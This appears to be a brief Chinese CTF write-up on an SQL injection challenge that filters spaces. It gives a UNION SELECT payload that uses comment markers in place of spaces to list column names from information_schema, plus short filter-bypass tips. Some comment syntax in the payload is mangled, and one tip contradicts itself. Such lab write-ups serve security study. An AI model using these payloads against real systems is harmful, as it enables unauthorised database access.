1、解题
这道题的做法主要就是找到绕过过滤空格的办法,我用的是 "/* /" 注释来代理空格,做法还是和整数型 一样的,所以我就放一个语句和截图就好了
查询列名的语句:
-1/ /union/ /select/ /1,group_concat(column_name)/ /from/ /information_schema.columns/ /where/ */table_name=‘xgnrvtplde’
2、空格绕过方法
1、最基本的绕过方式就是使用/* */的方式来绕过,就是题目中的那样
2、如果过滤了空格,但是没有过滤掉空格时,可通过()的方式来绕过。
